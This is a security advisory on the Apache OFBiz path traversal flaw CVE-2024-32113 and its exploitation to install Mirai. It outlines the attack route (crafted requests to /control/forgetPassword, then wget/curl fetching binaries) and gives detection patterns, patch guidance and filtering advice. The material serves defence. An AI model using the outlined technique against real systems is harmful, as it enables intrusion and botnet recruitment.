CVE-2024-32113: Apache OFBiz RCE Exploited for Mirai Botnet

Recent threat intelligence confirms that attackers are actively targeting a critical CVE in Apache Open For Business (OFBiz), an open-source Enterprise Resource Planning (ERP) suite. According to SANS Internet Storm Center, exploitation of CVE-2024-32113 has transitioned from theoretical proof-of-concept to active deployment of the Mirai malware family. This vulnerability, which carries a CVSS score of 9.8, represents a significant risk to organizations relying on unpatched ERP infrastructure.

Technical Analysis: Mirai botnet Apache OFBiz exploitation

The vulnerability is rooted in a path traversal flaw within the web interface of Apache OFBiz. Specifically, the software failed to properly sanitize URI inputs, allowing attackers to manipulate request paths to bypass internal security filters. The primary TTP observed involves sending a crafted HTTP request to the /control/forgetPassword endpoint. By appending semicolon-delimited segments or specific traversal sequences, attackers can force the application to execute arbitrary code with the privileges of the OFBiz process.

Once the RCE is achieved, the automated exploitation scripts typically attempt to download and execute a shell script. These scripts are designed to fetch various Mirai binaries compiled for different CPU architectures (e.g., ARM, MIPS, x86). This activity effectively recruits the compromised server into a botnet, which is then used for launching DDoS attacks or further network scanning. Because ERP systems often have significant outbound bandwidth and are rarely rebooted, they are ideal candidates for maintaining botnet persistence.

How to detect CVE-2024-32113 exploit attempts

Defenders can identify exploitation attempts by monitoring web server access logs for unusual URI patterns. Security teams should prioritize searching for requests containing /control/forgetPassword; or similar variations where non-standard characters are used to obfuscate the path. Furthermore, the presence of outbound connections to known malicious IP addresses on ports commonly associated with malware delivery—such as 80, 443, or 8080—should be investigated.

Automating the detection process by ingesting these logs into a SIEM allows for real-time alerting. An effective IoC strategy involves correlating these web requests with subsequent suspicious process execution, such as wget or curl commands fetching binary files from remote repositories. A modern EDR solution should also flag the spawning of a system shell from the Java-based OFBiz process, as this is a high-confidence indicator of compromise.

Apache OFBiz 18.12.13 patch guidance

The most effective mitigation is the immediate application of the official security update. Apache released version 18.12.13 specifically to address this path traversal issue. Organizations should verify their current versioning and prioritize the update on all internet-facing instances. If an immediate update is not feasible, the SOC should implement strict ingress filtering. Blocking access to the /control/ directory from external IP addresses, or specifically restricting access to the forgetPassword functionality, can provide temporary protection.

In addition to patching, security administrators should audit their systems for existing signs of compromise. Check for the existence of unexpected files in /tmp or /var/run and review active network connections for persistence mechanisms. Given that the vulnerability allows for unauthenticated code execution, assuming a breach has occurred on any unpatched, internet-exposed system is a prudent defensive posture.